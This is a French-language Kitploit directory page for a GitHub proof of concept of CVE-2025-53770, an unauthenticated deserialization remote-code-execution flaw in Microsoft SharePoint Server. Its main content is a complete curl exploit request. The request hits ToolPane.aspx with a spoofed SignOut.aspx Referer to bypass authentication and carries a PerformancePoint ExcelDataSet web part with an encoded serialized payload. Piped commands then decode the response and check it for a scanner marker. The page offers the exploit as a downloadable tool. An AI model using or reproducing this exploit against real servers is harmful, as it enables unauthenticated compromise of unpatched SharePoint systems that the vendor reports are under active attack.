Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-53770-SharePoint-Deserialization-RCE-PoC — Une vulnérabilité critique dans Microsoft SharePoint Server permet une exécution de code à distance non authentifiée via la désérialisation de données non fiables. Microsoft est conscient d'une exploitation active ; appliquez immédiatement les mesures d'atténuation du CVE. Gravité : Critique. | Kitploit
Outils/GitHubGitHub/harryhaxor/cve-2025-53770-sharepoint-deserialization-rce-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubharryhaxor/cve-2025-53770-sharepoint-deserialization-rce-poc

CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

Voir le dépôt
16il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Une vulnérabilité critique dans Microsoft SharePoint Server permet une exécution de code à distance non authentifiée via la désérialisation de données non fiables. Microsoft est conscient d'une exploitation active ; appliquez immédiatement les mesures d'atténuation du CVE. Gravité : Critique.

Partager

CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

Une vulnérabilité critique dans Microsoft SharePoint Server permet une exécution de code à distance non authentifiée via la désérialisation de données non fiables. Microsoft est conscient d'une exploitation active ; appliquez immédiatement les mesures d'atténuation de CVE. Gravité : Critique.

commandes

curl -sk -X POST 'https://reeaccated.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx'
-H 'Referer: /_layouts/SignOut.aspx'
-H 'Content-Type: application/x-www-form-urlencoded'
--data-urlencode 'MSOTlPn_Uri=https://reeaccated.com'
--data-urlencode 'MSOTlPn_DWP= <%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %> <%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %> <asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">

<Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</asp:UpdateProgress>'
| grep -oP 'CompressedDataTable="\K[^&]+(?=")'
| base64 -d 2>/dev/null
| gzip -d 2>/dev/null
| tee /tmp/sharepoint_decoded_payload.txt
| grep -Ei 'IntruderScannerDetectionPayload|ExcelDataSet|divWaiting|ProgressTemplate|Scorecard'

Télécharger l’outil